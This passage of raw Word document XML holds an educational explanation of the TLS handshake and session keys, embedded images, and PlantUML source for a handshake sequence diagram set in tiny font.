          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A TLS handshake uses something called </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>asymmetric encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, meaning that two different keys are used on the two ends of the conversation. This is possible because of a technique called </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">public key cryptography: </w:t>
      </w:r>
      <w:r>
        <w:t>Data encrypted with the public key can only be decrypted with the private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5CE50" w14:textId="77777777" w:rsidR="00C155DE" w:rsidRDefault="00C155DE" w:rsidP="00CF327E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the TLS handshake, the client and server use the public and private keys to exchange randomly generated data. This random data is used to create new keys for encryption, called the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>session keys</w:t>
      </w:r>
      <w:r>
        <w:t>. They</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6A34">
        <w:t xml:space="preserve"> will be used to encrypt and decrypt all communications after the TLS handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68EF21" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRDefault="00C155DE" w:rsidP="00CF327E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C6A34">
        <w:t xml:space="preserve">Once session keys are in use, the public and private keys are not used anymore. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3588B3F2" w14:textId="4C964F31" w:rsidR="00C155DE" w:rsidRDefault="00C155DE" w:rsidP="00CF327E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C6A34">
        <w:t>Session keys are temporary keys that are not used again once the session is terminated. A new, random set of session keys will be created for the next session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543BF58B" w14:textId="668A145F" w:rsidR="003C6A34" w:rsidRDefault="003C6A34" w:rsidP="003C6A34">
      <w:r>
        <w:t>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8125"/>
        <w:gridCol w:w="1188"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B4283" w14:paraId="15D67323" w14:textId="77777777" w:rsidTr="006B4283">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8183" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BFA3039" w14:textId="6D8D5A9A" w:rsidR="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="003C6A34">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BD7A0C5" wp14:editId="032CED04">
                  <wp:extent cx="4843145" cy="10972800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1535557748"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145" cy="10972800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8125" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59532EDB" w14:textId="55A40540" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71CE632B" wp14:editId="59FC037B">
                  <wp:extent cx="3374565" cy="5581291"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="112482658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4331" cy="5630521"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="576603DF" w14:textId="1F855679" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAF6D4E" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title SSL/TLS Handshake and Secure Communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08014DBD" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>actor Client</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350FFDA3" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>actor Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="418235F9" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B5D708B" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>group Handshake Phase</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB34B3B" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Server: Send ClientHello</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B59DBE5" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6155A247" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Client sends supported TLS versions, cipher suites, and compression methods  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D3F5F93" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Includes client random number for key generation  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734265D0" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - May include Server Name Indication (SNI) for virtual hosting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5548CD7A" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FFB755" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412914F1" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: Send ServerHello</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60152BF4" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274417A5" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Server selects TLS version and cipher suite from client's list  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4BCCE9" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Sends server random number  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4900FAC8" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - May request client certificate for mutual authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45A1B97A" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68554998" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AF548FA" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: Send server certificate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EFD62DC" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C642B2" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Server sends its digital certificate containing public key  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F9B062" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Certificate chain is provided for validation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F0740C" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A0BF09" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ECD8B78" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: Send ServerHelloDone</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6C5436" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE75862" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Client: Verify server certificate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12368D5B" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D9A929" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Checks certificate validity, CA trust, and hostname match  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263B6037" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Verifies certificate against trusted CAs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EE6DB0C" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="096E36A0" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="643254BD" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Server: Send ClientKeyExchange</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E9D4D6" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A971174" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Sends pre-master secret encrypted with server's public key</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30853E6C" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B88051" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1F570C" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Server: Send ChangeCipherSpec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5B6D55" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A7E3E1A" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Signals switch to negotiated symmetric encryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38215EC3" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="733D2738" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C167B05" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Server: Send Finished</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557A230A" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
